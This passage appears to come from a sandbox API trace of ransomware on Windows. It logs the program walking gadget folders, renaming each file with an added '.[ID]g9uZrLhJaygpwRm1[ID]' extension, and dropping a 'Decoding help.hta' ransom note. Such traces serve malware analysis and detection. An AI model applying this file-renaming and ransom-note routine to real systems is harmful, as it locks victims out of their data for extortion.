Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="add_up.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" [0061.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" [0061.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.506] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862b3fa9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x862b3fa9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-docked.png", cAlternateFileName="")) returned 1 [0061.506] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.507] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-docked.png") returned 1 [0061.507] lstrlenW (lpString="base-docked.png") returned 15 [0061.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-docked.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" [0061.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" [0061.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.507] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29714061, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x29714061, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xaa66, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-2.png", cAlternateFileName="")) returned 1 [0061.507] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.507] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-undocked-2.png") returned 1 [0061.507] lstrlenW (lpString="base-undocked-2.png") returned 19 [0061.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-undocked-2.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" [0061.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" [0061.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.508] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86267cef, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86267cef, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-3.png", cAlternateFileName="")) returned 1 [0061.508] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.508] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-undocked-3.png") returned 1 [0061.508] lstrlenW (lpString="base-undocked-3.png") returned 19 [0061.508] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-undocked-3.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" [0061.508] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" [0061.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.508] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8628de4c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8628de4c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2973a1bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf240, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-4.png", cAlternateFileName="")) returned 1 [0061.508] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.509] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-undocked-4.png") returned 1 [0061.509] lstrlenW (lpString="base-undocked-4.png") returned 19 [0061.509] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.509] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.509] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-undocked-4.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" [0061.509] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" [0061.509] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.525] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863987d7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863987d7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb93, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-left.png", cAlternateFileName="")) returned 1 Thread: id = 991 os_tid = 0xde0 [0060.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*", lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22fbc446, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558828 [0060.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.276] FindNextFileW (in: hFindFile=0x24558828, lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22fbc446, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.276] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.276] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.276] FindNextFileW (in: hFindFile=0x24558828, lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22fbc446, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0060.276] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0060.276] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0060.276] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0060.276] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0060.276] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 75 [0060.276] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css" [0060.276] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*" [0060.276] GlobalMemoryStatus (in: lpBuffer=0x27adfd10 | out: lpBuffer=0x27adfd10) [0060.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9912a50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa50 [0064.501] CloseHandle (hObject=0xa50) returned 1 [0064.501] FindNextFileW (in: hFindFile=0x24558828, lpFindFileData=0x27adfd30 | out: lpFindFileData=0x27adfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 Thread: id = 992 os_tid = 0xdec [0060.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*", lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x806605fc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x806605fc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245588e8 [0060.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.280] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x806605fc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x806605fc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.282] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.282] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38888b53, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x38888b53, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x38888b53, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb22, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.png", cAlternateFileName="")) returned 1 [0060.282] lstrcpyW (in: lpString1=0x10fc4d88, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0060.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0060.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0060.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.517] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x27c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x27c1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.518] CloseHandle (hObject=0x698) returned 1 [0061.518] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows 